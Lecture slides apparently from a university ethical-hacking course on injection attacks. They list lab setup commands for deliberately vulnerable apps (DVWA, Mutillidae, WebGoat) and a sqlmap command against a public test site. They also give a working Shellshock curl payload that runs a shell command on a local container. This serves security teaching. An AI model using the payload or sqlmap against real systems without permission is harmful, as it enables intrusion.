IT 4510 : Ethical Hacking

Injections

Dr Joe Francom

Command Injection

• Shellshock
• Example:
  • docker run -d --rm -p 8888:80 joelongtoe/shellshock-example
  • curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /bin/ls /' http://127.0.0.1:8888/cgi-bin/welcome.sh
  • You can view the contents of that welcome script in: cat /usr/lib/cgi-bin/welcome.sh. Maybe by doing docker exec pensive_mendeleev /bin/cat /usr/lib/cgi-bin/welcome.sh

SQL Injection

• docker run -p 1337:80 szsecurity/mutillidae
• docker run --rm -it -p 80:80 vulnerables/web-dvwa
• Can use sqlmap on this site: http://testphp.vulnweb.com/listproducts.php?cat=1
  • sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

Zap and Goat

• docker run --rm -d -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=America/Boise webgoat/goatandwolf
• sudo apt install zaproxy